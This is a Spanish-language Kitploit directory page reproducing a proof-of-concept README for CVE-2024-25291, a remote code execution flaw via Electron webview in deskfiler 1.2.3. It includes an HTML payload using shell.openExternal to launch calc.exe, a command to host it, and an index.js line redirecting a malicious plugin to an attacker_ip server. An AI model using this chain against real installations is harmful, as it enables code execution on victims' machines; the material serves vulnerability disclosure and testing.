Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2024-25291 — deskfiler 1.2.3 exploit de redirección abierta | Kitploit
Herramientas/GitHubGitHub/eqstlab/cve-2024-25291
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónRed TeamingDesarrollo de Payloads
GitHubeqstlab/cve-2024-25291

CVE-2024-25291

deskfiler 1.2.3 exploit de redirección abierta

Ver Repositorio
hace 1 añoAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

DeskFiler RCE

Una prueba de concepto para la vulnerabilidad CVE-2024-25291.

deskfiler - 1.2.3 permite Electron webview en la aplicación, con el consiguiente código remoto En este repositorio hay un ejemplo de aplicación vulnerable y un exploit de prueba de concepto (POC) de la misma.

Como PoC, hay un archivo de Python que automatiza el proceso.

1. Resumen de la vulnerabilidad:

  • Tema de la vulnerabilidad: Open Redirect mediante RCE
  • Versión vulnerable: deskfiler-1.2.3
  • Manifestación del problema: Electron Webview
  • Tipo de ataque: Ejecución Remota de Código
  • Vectores de ataque: Para explotar la vulnerabilidad, alguien debe abrir el complemento.
  • Número CVE reservado: CVE-2024-25291

2. Causa de la vulnerabilidad:

  • Explicación del exploit
    • Dentro de la aplicación, se pudo confirmar una sección que accede a un enlace externo a través de un Webview mediante Electron. Por lo tanto, a través de esto, es posible lograr un RCE conectándose al servidor del atacante.

Prueba de concepto (POC)

  • Paso 1) Prepare el servidor del atacante y cree un complemento malicioso.
root@kitploit:~
<html>
 <head>
 <title>jruru</title>
 </head>
 <body>
 <script>
 const { shell } = require('electron');
 shell.openExternal('file:C:/Windows/System32/calc.exe');
 </script>
 </body>
 </html>

※ Si desea probarlo rápidamente, cree un servidor en el PC del atacante con el siguiente código.

root@kitploit:~
$ python -m http.server 80

Nota: ※ En este momento, se asume que el complemento es un complemento generado por el atacante, y es solo un complemento normal con un código añadido para permitir el acceso al servidor del atacante. Se ha seleccionado BareBone para pruebas simples. deskfiler1

Después, agregue el siguiente código al archivo index.js en la ruta de la carpeta BareBone.

root@kitploit:~
window.location='http://[attacker_ip]/hack.html'
  • Paso 2) En el servidor de la víctima, ejecute Deskfiler e instale el complemento BareBone a través de "Add new plugin." deskfiler2

deskfiler3


3. Información adicional

En este PoC, utilizamos un complemento; sin embargo, creemos que con vectores de ataque alternativos es posible lograr una Ejecución Remota de Código (RCE) de forma independiente. Además, si existen vulnerabilidades del lado del servidor como XSS Almacenado, XSS Reflejado, también se considera factible la RCE.

Descargar herramienta